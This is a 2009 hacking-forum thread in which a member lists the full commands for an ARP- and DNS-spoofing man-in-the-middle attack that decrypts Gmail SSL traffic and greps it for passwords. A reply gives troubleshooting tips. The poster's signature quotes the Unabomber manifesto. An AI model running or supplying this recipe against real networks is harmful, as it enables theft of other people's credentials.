HellBound Hackers
Join us at IRC!
Few are those who can see with their own eyes and hear with their own hearts. - Albert Einstein
Thursday, May 24, 2012
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
HellBoundHackers Additional:
Shop
Learn
Communicate
Submit
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Interact
Other
HellBoundHackers Executive:
HellBoundHackers Leisure:
Members Online
Total Online: 33
Web Spiders: 14
Guests Online: 31
Members Online: 2
CrownClown, johny34

Registered Members: 70189
Newest Member: CrownClown
Latest Articles
View Thread

HellBound Hackers | HellBound Hackers | Questions
Author

How to decrypt SSL traffic using a MITM attack
John Doe
Member



Posts: 14
Location: Underneath your keyboard
Joined: 03.03.09
Rank: Apprentice
Posted on 05-03-09 01:08
http://www.hackerscenter.com/index.php?/Video/General/How-to-decrypt-SSL-encrypted-traffic-using-a-man-in-the-middle-attack-Auditor.html

I've followed this step by step and have not had any luck capturing my own password.. what might I be doing wrong?

commands ran--

fragrouter -B1
arpspoof -t XX.XX.XX.XX XX.Router.IP.ADD
webmitm (made a cert)
dnsspoof

wireshark (and start recording everything)

On the victim machine when I perform an nslookup on gmail , the ip address is from my local area network.

Secondly on the victim machine, when I visit gmail.com over https, there is a warning about the fake certificate I issued using the attackers rig.

Log in to my own account.

Switch back to the attackers rig.

Save the captured packets.

Then I ran : ssldump -r capture -k webmitm.crt -d > out

Lastly: cat out | grep 'Passwd'

I get nothing, and I looked through the out file and it seems like I am recording the traffic that is for gmail.com .. but I can't see my own password.. any ideas?

Thank you guys for any words of wisdom.

"Cheap, intemperate propaganda sometimes achieves impressive short-term goals, but it will be more advantageous in the long run to keep the loyalty of a small number of intelligently committed people than to arouse the passions of the unthinking, fickle mob who will change their attitude as soon as someone comes along with a better propaganda gimmick. However, propaganda of the rabble-rousing type may be necessary when the system is nearing the point of collapse and there is a final struggle between rival ideologies to determine which will become dominant when the old world-view goes under....Until the time comes for the final push toward revolution, the task of revolutionaries will be less to win the shallow support of the majority then to build a small core of deeply committed people."


- The Unabomber Manifesto,
Paragraphs 188 - 189

${LIFE}="";
Author

RE: How to decrypt SSL traffic using a MITM attack
Cracker_Jax
Member



Posts: 155
Location: США
Joined: 11.12.07
Rank: Elite
Posted on 06-03-09 05:46
more than one way to skin a cat

no need for fragrouter:
echo "1" > /proc/sys/net/ipv4/ip_forward


and remember

Lastly: cat out | grep 'Passwd


linux is case sensitive and read the manual

man grep


HaxLabs Pentest Lab
www.haxlabs.com
Guest
Username

Password

Remember Me


Bookmark This Page
Affiliates
Adverts

 

 

Links

Anime Wallpaper Site
By using, viewing or obtaining any information contained on this site, you agree to the disclaimer.

© HellBound Hackers 2008- 2009. Since 3rd December 2004.

20607582 Unique Visits

Powered by HBH-Fusion